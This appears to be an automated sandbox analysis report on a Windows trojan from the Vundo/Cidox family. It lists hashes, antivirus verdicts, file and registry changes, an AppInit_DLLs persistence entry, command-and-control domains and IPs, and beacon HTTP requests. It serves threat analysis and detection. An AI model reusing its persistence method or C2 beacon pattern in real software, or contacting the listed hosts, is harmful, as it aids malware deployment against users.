Analysis Date | 2014-12-21 17:01:30 |
---|---|
MD5 | 04d6c87bc5128ece18e7ea49fbc16d82 |
SHA1 | a01ed115bfac92fabf4679f3f8d86e6290a0b5ea |
Static Details:
File type | PE32 executable for MS Windows (GUI) Intel 80386 32-bit | |
---|---|---|
Section | .text md5: 5da4bab728b5bea6949d94d89b5c9de9 sha1: 600ac9bb0d1c6bee165d5318800b7599c0ff3742 size: 27136 | |
Section | .rdata md5: d064eb1d9859b2486ebba8fa8e695cb0 sha1: a24d91e096de13882d5a8747a7c94b5de841967e size: 7680 | |
Section | .data md5: cba969fd083d72eda735679569df81b7 sha1: b5356fd63bc3ab5456b6c2ba7cda3ca352c2c520 size: 5120 | |
Section | .rsrc md5: 266c52478d16e258367b73f5ebf6cf5c sha1: d453c6feafe6feaf2360979e25c440ae1b3696b4 size: 406016 | |
Timestamp | 2012-11-29 17:44:00 | |
Packer | Microsoft Visual C++ ?.? | |
PEhash | 22782c1111141b117c911e6b105a9cf17b91f0aa | |
IMPhash | bcbfefffacb508a2cf625400da40f22d | |
AV | 360 Safe | Gen:Variant.Symmi.7206 |
AV | Ad-Aware | Gen:Variant.Symmi.7206 |
AV | Alwil (avast) | Crypt-OXO [Trj] |
AV | Arcabit (arcavir) | Gen:Variant.Symmi.7206 |
AV | Authentium | W32/Cidox.A.gen!Eldorado |
AV | Avira (antivir) | TR/Drop.Vundo.voua |
AV | BullGuard | Gen:Variant.Symmi.7206 |
AV | CA (E-Trust Ino) | no_virus |
AV | CAT (quickheal) | Trojan.Vundo.Gen |
AV | ClamAV | WIN.Trojan.Cidox-1000 |
AV | Dr. Web | Trojan.Inject1.14679 |
AV | Emsisoft | Gen:Variant.Symmi.7206 |
AV | Eset (nod32) | Win32/Kryptik.APTP |
AV | Fortinet | W32/Kryptik.APTP!tr |
AV | Frisk (f-prot) | W32/Cidox.A.gen!Eldorado |
AV | F-Secure | Gen:Variant.Symmi.7206 |
AV | Grisoft (avg) | Generic_r.BNL |
AV | Ikarus | Trojan-Dropper.Win32.Vundo |
AV | K7 | Backdoor ( 04c531cb1 ) |
AV | Kaspersky | Trojan.Win32.Generic |
AV | MalwareBytes | no_virus |
AV | Mcafee | no_virus |
AV | Microsoft Security Essentials | TrojanDropper:Win32/Vundo.V |
AV | MicroWorld (escan) | Gen:Variant.Symmi.7206 |
AV | Rising | no_virus |
AV | Sophos | no_virus |
AV | Symantec | no_virus |
AV | Trend Micro | TROJ_VUNDO.SMKK |
AV | VirusBlokAda (vba32) | Backdoor.Cidox |
Runtime Details:
Process
↳ C:\malware.exe
Creates File | C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp |
---|---|
Creates File | C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\desktop.ini |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini |
Deletes File | C:\Documents and Settings\Administrator\Cookies\index.dat |
Process
↳ C:\WINDOWS\Explorer.EXE
Registry | HKEY_CURRENT_USER\SessionInformation\ProgramCount ➝ NULL |
---|---|
Creates File | C:\WINDOWS\system32\jqkjigg.dll |
Creates File | \Device\Afd\Endpoint |
Creates File | C:\Documents and Settings\Administrator\Cookies\cf |
Deletes File | C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp |
Deletes File | C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg |
Creates Process | C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg |
Winsock DNS | detoxist.com |
Winsock DNS | clickbeta.ru |
Winsock DNS | 91.220.35.154 |
Winsock DNS | veroconma.com |
Winsock DNS | terrans.su |
Winsock DNS | getinball.com |
Winsock DNS | theloamva.com |
Winsock DNS | tryatdns.com |
Winsock DNS | clickclans.ru |
Winsock DNS | dentagod.com |
Winsock DNS | denareclick.com |
Winsock DNS | debijonda.com |
Winsock DNS | fescheck.com |
Winsock DNS | liteworns.com |
Winsock DNS | getintsu.com |
Winsock DNS | nshouse1.com |
Winsock DNS | vengibit.com |
Winsock DNS | tryangets.com |
Winsock DNS | netrovad.com |
Winsock DNS | vornedix.com |
Winsock DNS | inzavora.com |
Winsock DNS | getavodes.com |
Winsock DNS | googbeds.com |
Winsock DNS | clickstano.com |
Process
↳ C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ➝ C:\WINDOWS\system32\jqkjigg.dll\\x00 |
---|
Network Details:
DNS | detoxist.com Type: A 141.8.225.80 |
---|---|
DNS | debijonda.com Type: A 141.8.225.80 |
DNS | veroconma.com Type: A 74.117.179.241 |
DNS | theloamva.com Type: A 141.8.225.80 |
DNS | vornedix.com Type: A 141.8.225.80 |
DNS | dentagod.com Type: A 141.8.225.80 |
DNS | liteworns.com Type: A 141.8.225.80 |
DNS | vengibit.com Type: A 141.8.225.80 |
DNS | tryangets.com Type: A 141.8.225.80 |
DNS | getintsu.com Type: A 209.222.14.3 |
DNS | getavodes.com Type: A 209.222.14.3 |
DNS | inzavora.com Type: A 209.222.14.3 |
DNS | googbeds.com Type: A |
DNS | getinball.com Type: A |
DNS | tryatdns.com Type: A |
DNS | fescheck.com Type: A |
DNS | netrovad.com Type: A |
DNS | terrans.su Type: A |
DNS | clickstano.com Type: A |
DNS | denareclick.com Type: A |
DNS | clickbeta.ru Type: A |
DNS | nshouse1.com Type: A |
DNS | clickclans.ru Type: A |
HTTP GET | http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=313&av=0&vm=0&al=0&p=744&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/ktwJzsJOjUVkVi2kwdWOx5Sk+jQOcwE3AwJ5rIVt4b User-Agent: |
HTTP GET | http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=313&av=0&vm=0&al=0&p=744&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/ktwJzsJOjUVkVi2kwdWOx5Sk+jQOcwE3qqUGBSDArN User-Agent: |
HTTP GET | http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=313&av=0&vm=0&al=0&p=744&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/ktwJzsJOjUVkVi2kwdWOx5Sk+jQOcwE3Ty/Kkl6I5R User-Agent: |
HTTP GET | http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=313&av=0&vm=0&al=0&p=744&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/ktwJzsJOjUVkVi2kwdWOx5Sk+jQOcwE3Ty/Kkl6I5R User-Agent: |
HTTP GET | http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=313&av=0&vm=0&al=0&p=744&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/ktwJzsJOjUVkVi2kwdWOx5Sk+jQOcwE35k189R3Z+J User-Agent: |
HTTP GET | http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=313&av=0&vm=0&al=0&p=744&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/ktwJzsJOjUVkVi2kwdWOx5Sk+jQOcwE35k189R3Z+J User-Agent: |
HTTP GET | http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=313&av=0&vm=0&al=0&p=744&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/ktwJzsJOjUVkVi2kwdWOx5Sk+jQOcwE91YPO4yATM3 User-Agent: |
HTTP GET | http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=313&av=0&vm=0&al=0&p=744&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/ktwJzsJOjUVkVi2kwdWOx5Sk+jQOcwE6NqE7LPJWfi User-Agent: |
HTTP GET | http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=313&av=0&vm=0&al=0&p=744&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/ktwJzsJOjUVkVi2kwdWOx5Sk+jQOcwE6NqE7LPJWfi User-Agent: |
HTTP GET | http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=313&av=0&vm=0&al=0&p=744&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/ktwJzsJOjUVkVi2kwdWOx5Sk+jQOcwE6NqE7LPJWfi User-Agent: |
HTTP GET | http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=313&av=0&vm=0&al=0&p=744&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/ktwJzsJOjUVkVi2kwdWOx5Sk+jQOcwExV/pFEBgjnW User-Agent: |
HTTP GET | http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=313&av=0&vm=0&al=0&p=744&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/ktwJzsJOjUVkVi2kwdWOx5Sk+jQOcwE6NqE7LPJWfi User-Agent: |
HTTP GET | http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=313&av=0&vm=0&al=0&p=744&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/ktwJzsJOjUVkVi2kwdWOx5Sk+jQOcwE0kYoGs6AkVa User-Agent: |
Flows TCP | 192.168.1.1:1031 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1032 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1033 ➝ 74.117.179.241:80 |
Flows TCP | 192.168.1.1:1034 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1035 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1036 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1037 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1038 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1039 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1040 ➝ 209.222.14.3:80 |
Flows TCP | 192.168.1.1:1041 ➝ 209.222.14.3:80 |
Flows TCP | 192.168.1.1:1042 ➝ 209.222.14.3:80 |
Flows TCP | 192.168.1.1:1043 ➝ 91.220.35.154:80 |
Raw Pcap
Strings